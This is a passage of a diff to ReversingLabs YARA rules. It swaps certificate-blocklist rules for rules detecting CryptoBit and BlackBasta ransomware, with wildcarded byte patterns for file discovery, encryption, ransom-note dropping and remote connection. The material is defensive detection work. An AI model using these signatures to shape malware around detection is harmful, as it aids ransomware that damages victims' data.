?? ?? ?? ?? 25 1F + ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A + } + $change_desktop = { + 1F ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 28 ?? ?? ?? + ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 17 + 8C ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 8C ?? ?? ?? ?? 6F ?? ?? ?? ?? 1F ?? 16 + 06 19 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 2A + } + $drop_ransom_note = { + 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 2A 00 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 02 7B ?? ?? + ?? ?? 6F ?? ?? ?? ?? 0D 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? + ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 06 6F ?? ?? ?? ?? 26 07 6F ?? + ?? ?? ?? 26 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? + 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 07 11 ?? 6F ?? ?? ?? ?? 26 12 ?? 28 ?? ?? ?? ?? 2D ?? + DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 07 6F ?? ?? ?? ?? 0C 02 28 ?? ?? ?? ?? + 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 02 7B ?? ?? ?? ?? 28 ?? ?? + ?? ?? 06 28 ?? ?? ?? ?? 11 ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? DE ?? + 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 26 + DE ?? 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Helpful Technologies, Inc" and (pe.signatures[i].serial=="00:83:f6:8f:c6:83:4b:f8:bd:2c:80:1a:2d:1f:1a:cc:76" or pe.signatures[i].serial=="83:f6:8f:c6:83:4b:f8:bd:2c:80:1a:2d:1f:1a:cc:76") and 1407715199<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ($change_desktop) and ($drop_ransom_note) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_F385E765Acfb95605C9B35Ca4C32F80E : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Cryptobit : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects CryptoBit ransomware." author = "ReversingLabs" - id = "865f8daf-35c4-5437-9c97-9b9fc48d7d70" - date = "2023-11-08" - modified = "2023-11-08" + id = "8566e516-9884-5b20-90c4-7ed38fa96999" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2710-L2728" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c73c8f1913d3423a52f5e77751813460ae9200eb3cb1cc6e2ec30f37f0da8152" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.CryptoBit.yara#L1-L113" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ccc8a0f1c5e11211649992d0f2b309968c97b49f1c7359e62d622f364e117429" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "CryptoBit" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 55 8B EC 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 + 7D ?? ?? 75 ?? FF 75 ?? EB ?? 6A ?? 59 83 C9 ?? 83 F1 ?? 89 4D ?? 6A ?? 6A ?? 6A ?? + 6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 0B C0 0F 84 ?? ?? ?? ?? 89 45 ?? 60 BE ?? ?? ?? + ?? 56 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 33 D2 + 8B 0D ?? ?? ?? ?? F7 F1 0B C0 74 ?? FF 35 ?? ?? ?? ?? EB ?? 52 8B 0C 24 29 4D ?? 51 + FF 75 ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 0B C0 74 ?? 89 45 ?? 51 FF + 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 75 ?? 89 45 ?? 89 4D ?? FF 75 ?? + E8 ?? ?? ?? ?? EB ?? EB ?? 83 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? EB ?? A1 ?? ?? ?? + ?? 01 45 ?? EB ?? EB ?? 8B 64 24 ?? 64 8F 05 ?? ?? ?? ?? 83 C4 ?? 61 EB ?? EB ?? 64 + 8F 05 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 4D + ?? EB ?? 8B 45 ?? C9 C2 + } + $encrypt_files_p2 = { + 55 8B EC 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A + ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? + ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? + 0B C0 74 ?? E9 ?? ?? ?? ?? 89 45 ?? 8B 15 ?? ?? ?? ?? 8B 4D ?? 0B C9 75 ?? 83 F8 ?? + 73 ?? E9 ?? ?? ?? ?? EB ?? 0B C9 75 ?? 3B C2 73 ?? 50 EB ?? 52 8F 45 ?? 83 7D ?? ?? + 75 ?? A1 ?? ?? ?? ?? 39 45 ?? 72 ?? FF 75 ?? FF 75 ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? + ?? 89 45 ?? 0B C0 74 ?? 6A ?? 50 51 FF 75 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A + ?? 6A ?? 6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? 89 45 ?? 60 BE ?? ?? ?? ?? + 56 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? FF 75 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF + 75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? 50 8B 4D ?? 8B 04 24 83 C9 ?? 83 F1 ?? 51 50 E8 ?? + ?? ?? ?? 89 45 ?? 0B C0 74 ?? 6A ?? 50 51 FF 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB + ?? 8B 64 24 ?? 64 8F 05 ?? ?? ?? ?? 83 C4 ?? 61 EB ?? EB ?? 64 8F 05 ?? ?? ?? ?? 83 + C4 ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? ?? + ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 4D ?? EB ?? 33 C0 33 C9 C9 C2 + } + $find_files_p1 = { + 55 8B EC 83 C4 ?? 57 56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? 83 7E ?? ?? 75 ?? E8 ?? ?? ?? ?? 50 8D 46 ?? 50 E8 + ?? ?? ?? ?? 23 C0 0F 84 ?? ?? ?? ?? EB ?? 83 7E ?? ?? 75 ?? FF 35 ?? ?? ?? ?? 8D 46 + ?? 50 E8 ?? ?? ?? ?? 23 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 23 C0 0F + 84 ?? ?? ?? ?? 89 45 ?? B9 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 23 C0 0F 84 ?? + ?? ?? ?? 89 45 ?? 8B 75 ?? 8B 7D ?? 68 ?? ?? ?? ?? 57 56 E8 ?? ?? ?? ?? 8D 57 ?? 8B + 47 ?? D1 E0 C7 04 10 ?? ?? ?? ?? C6 44 10 ?? ?? FF 75 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? + 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 8B 75 ?? 8B 7D ?? 8B 02 25 ?? ?? ?? ?? + 0F 85 ?? ?? ?? ?? 8B 02 83 E0 ?? 0F 85 ?? ?? ?? ?? 8B 02 83 E0 ?? F7 02 ?? ?? ?? ?? + 0F 85 ?? ?? ?? ?? 8D 47 ?? 50 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 42 ?? 50 8D 47 + ?? 50 E8 ?? ?? ?? ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 89 47 ?? F7 02 ?? ?? ?? ?? + 74 ?? 68 ?? ?? ?? ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? FF 77 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? + 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? 48 50 FF 76 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 + } + $find_files_p2 = { + 0B C9 74 ?? FF 45 ?? E9 ?? ?? ?? ?? 83 7A ?? ?? 0F 84 ?? ?? ?? ?? 81 7A ?? ?? ?? ?? + ?? 0F 84 ?? ?? ?? ?? F7 02 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? F7 02 ?? ?? ?? ?? 0F 85 ?? + ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 74 ?? 8B F8 FF 76 ?? 8F 47 ?? FF 76 ?? + 8F 47 ?? FF 36 8F 07 8D 47 ?? 50 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 42 ?? 50 8D + 47 ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 8D 47 ?? 50 E8 ?? + ?? ?? ?? 89 47 ?? 83 3F ?? 75 ?? 57 68 ?? ?? ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 0B C0 75 + ?? 57 E8 ?? ?? ?? ?? EB ?? 57 E8 ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? FF 75 ?? FF 75 ?? + E8 ?? ?? ?? ?? 0B C0 0F 85 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? + 8B 75 ?? 83 7D ?? ?? 74 ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B + 14 24 51 50 52 8D 46 ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 D1 E1 8B 5C 24 ?? 51 50 53 8D 46 + ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? + ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? + ?? ?? ?? 8B 45 ?? 5E 5F C9 C2 + } + $remote_connection = { + 55 8B EC 81 C4 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? + 6A ?? E8 ?? ?? ?? ?? 23 C0 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A + ?? 6A ?? 6A ?? FF 75 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 89 85 ?? ?? ?? ?? 0F + 84 ?? ?? ?? ?? 8D 5D ?? C7 03 ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? + ?? ?? 50 E8 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? + ?? ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 45 ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? FF B5 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 23 C0 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 23 C0 89 85 ?? ?? ?? ?? 74 ?? + 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? + ?? FF B5 ?? ?? ?? ?? 0B C0 74 ?? 83 BD ?? ?? ?? ?? ?? 74 ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? + FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? C9 C2 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CWI SOFTWARE LTDA" and (pe.signatures[i].serial=="00:f3:85:e7:65:ac:fb:95:60:5c:9b:35:ca:4c:32:f8:0e" or pe.signatures[i].serial=="f3:85:e7:65:ac:fb:95:60:5c:9b:35:ca:4c:32:f8:0e") and 1382313599<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($remote_connection and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*))) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_F62C9C4Efc81Caf0D5A2608009D48018 : INFO FILE +rule REVERSINGLABS_Win64_Ransomware_Blackbasta : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects BlackBasta ransomware." author = "ReversingLabs" - id = "176434ae-7162-5b35-91f7-888536250884" - date = "2023-11-08" - modified = "2023-11-08" + id = "7a4ad567-0612-5a9c-8a06-4d615bc7e24a" + date = "2022-12-13" + modified = "2022-12-13" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2730-L2748" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "08fcff795297c0608b1a1d71465279cbf76d4dff06de2a2262a58debbb2f9e0d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win64.Ransomware.BlackBasta.yara#L1-L293" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "79c81a4470e9eabbd714b1a91621c7b2bbe42d5371ba2c799529662d5f5c479a" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "BlackBasta" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 48 8B 44 24 ?? 83 A0 ?? ?? ?? ?? ?? 44 8B C9 EB ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 44 38 + 75 ?? 74 ?? 48 8B 44 24 ?? 83 A0 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? EB ?? 44 38 75 ?? + 74 ?? 48 8B 44 24 ?? 83 A0 ?? ?? ?? ?? ?? 45 8B CE 4C 8D 44 24 ?? 48 8B CF 48 8D 54 + 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 4C 8D 45 ?? 85 C0 44 89 74 24 ?? 4C 89 74 24 ?? + 49 0F 45 CE 45 33 C9 33 D2 FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 4D 8B CC 45 + 33 C0 33 D2 48 8B CF E8 ?? ?? ?? ?? 8B D8 44 38 74 24 ?? 74 ?? 48 8B 4C 24 ?? E8 ?? + ?? ?? ?? 8B C3 E9 ?? ?? ?? ?? 49 8B 74 24 ?? 49 2B 34 24 48 C1 FE ?? 33 D2 4C 89 75 + ?? 48 8D 4D ?? 4C 89 75 ?? 4C 89 75 ?? 4C 89 75 ?? 4C 89 75 ?? 44 88 75 ?? E8 ?? ?? + ?? ?? 48 8B 45 ?? B9 ?? ?? ?? ?? 39 48 ?? 75 ?? 44 38 75 ?? 74 ?? 48 8B 45 ?? 83 A0 + ?? ?? ?? ?? ?? 44 8B C9 EB ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 44 38 75 ?? 74 ?? 48 8B 45 + ?? 83 A0 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? EB ?? 44 38 75 ?? 74 ?? 48 8B 45 ?? 83 A0 + ?? ?? ?? ?? ?? 45 8B CE 4C 8D 44 24 ?? 48 8D 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B + 75 ?? 33 D2 85 C0 49 8B CE 48 0F 45 CA 80 39 ?? 75 ?? 8A 41 ?? 84 C0 75 ?? 38 55 ?? + 74 ?? 49 8B CE E8 ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 38 51 ?? 74 ?? 4D 8B CC 4D 8B C5 48 + 8B D7 E8 ?? ?? ?? ?? 44 8B E8 85 C0 75 ?? 38 45 ?? 74 ?? 49 8B CE E8 ?? ?? ?? ?? 4C + 8B 6C 24 ?? 48 8D 55 ?? 48 8B CB FF 15 ?? ?? ?? ?? 45 33 F6 85 C0 0F 85 ?? ?? ?? ?? + 49 8B 04 24 49 8B 54 24 ?? 48 2B D0 48 C1 FA ?? 48 3B F2 74 ?? 48 2B D6 48 8D 0C F0 + 4C 8D 0D ?? ?? ?? ?? 45 8D 46 ?? E8 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 44 38 74 + 24 ?? 74 ?? 48 8B 4C 24 + } + $find_system_volumes_v1_p1 = { + 48 89 4C 24 ?? 55 53 56 57 41 56 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? + 48 8B F1 45 33 FF 44 89 7C 24 ?? 4C 89 39 4C 89 79 ?? 4C 89 79 ?? C7 44 24 ?? ?? ?? + ?? ?? BA ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 4C 8B F0 0F 1F 00 4C 8D 8D ?? + ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 + C0 0F 84 ?? ?? ?? ?? 44 89 7C 24 ?? 4C 89 7C 24 ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24 + ?? 4C 89 7C 24 ?? 45 33 C9 45 33 C0 33 D2 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 + C0 0F 84 ?? ?? ?? ?? F7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 48 8D 14 00 48 8D BD ?? ?? ?? ?? 48 03 FA 4C 89 7C 24 ?? 4C 89 + 7C 24 ?? 4C 89 7C 24 ?? 4C 89 7C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 48 + 8D 9D ?? ?? ?? ?? 48 D1 FA 48 83 FA ?? 72 ?? 45 33 C0 48 8D 4C 24 ?? E8 + } + $find_system_volumes_v1_p2 = { + 4C 89 7C 24 ?? 48 8D 44 24 ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 3B C7 74 + ?? 66 66 66 0F 1F 84 00 ?? ?? 00 00 44 0F B6 0B 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 3B + CA 73 ?? 48 8D 41 ?? 48 89 44 24 ?? 48 8D 44 24 ?? 48 83 FA ?? 48 0F 43 44 24 ?? 44 + 88 0C 08 C6 44 08 ?? ?? EB ?? 45 33 C0 41 8D 50 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 + 83 C3 ?? 48 3B DF 75 ?? 4C 89 BD ?? ?? ?? ?? 48 8B 46 ?? 48 3B 46 ?? 74 ?? 4C 89 38 + 4C 89 78 ?? 4C 89 78 ?? 41 B8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B C8 E8 ?? ?? ?? ?? 4C + 89 7C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 48 83 46 ?? ?? EB ?? 4C 8D 44 + 24 ?? 48 8B D0 48 8B CE E8 ?? ?? ?? ?? 90 48 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 FF C2 + 48 8B 4C 24 ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 + 48 83 C0 ?? 48 83 F8 ?? 77 ?? E8 ?? ?? ?? ?? 4C 89 7C 24 ?? 48 C7 44 24 ?? ?? ?? ?? + ?? C6 44 24 ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 54 24 ?? 49 8B CE FF 15 ?? ?? ?? ?? 85 C0 + 0F 85 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 48 8B C6 48 81 C4 + } + $set_default_icon_p1 = { + 48 89 5C 24 ?? 48 89 4C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 81 EC ?? ?? ?? ?? + 48 8B F1 45 33 ED 44 89 6C 24 ?? 4C 8B 35 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 4C 8B F8 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B C8 49 2B CE 49 3B CF 0F 82 ?? ?? + ?? ?? 4C 8D 25 ?? ?? ?? ?? 48 83 3D ?? ?? ?? ?? ?? 4C 0F 43 25 ?? ?? ?? ?? 4C 89 6C + 24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 4B 8D 2C 37 BB ?? ?? ?? ?? 48 8D 7C 24 ?? 48 3B + EB 0F 86 ?? ?? ?? ?? 48 8B DD 48 83 CB ?? 48 3B D8 76 ?? 48 8B D8 48 B8 ?? ?? ?? ?? + ?? ?? ?? ?? 48 8D 0C 00 EB ?? B8 ?? ?? ?? ?? 48 3B D8 48 0F 42 D8 48 8D 4B ?? 48 B8 + ?? ?? ?? ?? ?? ?? ?? ?? 48 3B C8 0F 87 ?? ?? ?? ?? 48 03 C9 48 81 F9 ?? ?? ?? ?? 72 + ?? 48 8D 41 ?? 48 3B C1 0F 86 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? + ?? ?? ?? 48 8D 78 ?? 48 83 E7 ?? 48 89 47 ?? EB ?? 48 85 C9 74 ?? E8 ?? ?? ?? ?? 48 + 8B F8 EB ?? 49 8B FD 48 89 7C 24 ?? 48 89 6C 24 ?? 48 89 5C 24 ?? 4B 8D 1C 36 4C 8B + } + $set_default_icon_p2 = { + C3 49 8B D4 48 8B CF E8 ?? ?? ?? ?? 48 8D 0C 3B 4F 8D 04 3F 48 8D 15 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 66 44 89 2C 6F BB ?? ?? ?? ?? 89 5C 24 ?? 48 8D 54 24 ?? 48 83 7C 24 ?? + ?? 48 0F 43 54 24 ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 84 24 ?? ?? ?? ?? + 48 89 44 24 ?? 4C 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 44 89 6C 24 ?? 45 33 C9 45 33 + C0 48 C7 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8B CE 48 83 7E ?? ?? 72 ?? + 48 8B 0E 8B 46 ?? 03 C0 89 44 24 ?? 48 89 4C 24 ?? 44 8B CB 45 33 C0 48 8D 15 ?? ?? + ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 33 D2 B9 ?? ?? ?? + ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? EB ?? 4C 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 4C 24 + ?? 45 33 C9 44 8B C0 33 D2 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 E3 ?? 89 5C 24 ?? 48 + 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B C1 48 81 + FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 77 ?? + E8 ?? ?? ?? ?? 4C 89 6C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 44 89 6C 24 ?? 48 8B CE + E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C + 5F 5E 5D C3 + } + $cmd_prompt = { + 48 89 5C 24 ?? 48 89 7C 24 ?? 55 48 8B EC 48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 + 48 89 45 ?? 48 8B D9 4C 8D 05 ?? ?? ?? ?? 33 FF 48 8D 4D ?? 33 D2 48 89 7D ?? E8 ?? + ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 85 DB 75 ?? 48 8B 4D ?? 48 85 C9 0F 84 ?? ?? + ?? ?? 33 D2 E8 ?? ?? ?? ?? 48 8B 4D ?? 8B D8 E8 ?? ?? ?? ?? 85 DB 40 0F 94 C7 E9 ?? + ?? ?? ?? 48 8B 45 ?? 48 8D 0D ?? ?? ?? ?? 48 89 45 ?? 48 89 4D ?? 48 89 5D ?? 48 89 + 7D ?? 48 85 C0 74 ?? E8 ?? ?? ?? ?? 8B 18 E8 ?? ?? ?? ?? 45 33 C9 4C 8D 45 ?? 33 C9 + 89 38 48 8B 55 ?? E8 ?? ?? ?? ?? 48 8B F8 83 F8 ?? 74 ?? E8 ?? ?? ?? ?? 89 18 EB ?? + E8 ?? ?? ?? ?? 83 38 ?? 74 ?? E8 ?? ?? ?? ?? 83 38 ?? 74 ?? 48 8B 4D ?? E8 ?? ?? ?? + ?? 83 CF ?? EB ?? E8 ?? ?? ?? ?? 89 18 48 8D 15 ?? ?? ?? ?? 45 33 C9 4C 8D 45 ?? 48 + 89 55 ?? 33 C9 E8 ?? ?? ?? ?? 48 8B F8 48 8B 4D ?? E8 ?? ?? ?? ?? 8B C7 48 8B 4D ?? + 48 33 CC E8 ?? ?? ?? ?? 4C 8D 5C 24 ?? 49 8B 5B ?? 49 8B 7B ?? 49 8B E3 5D C3 + } + $exclude_from_encryption = { + 66 89 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D + 4D ?? E8 ?? ?? ?? ?? 90 45 33 C0 48 8D 55 ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B F8 48 8B + 55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 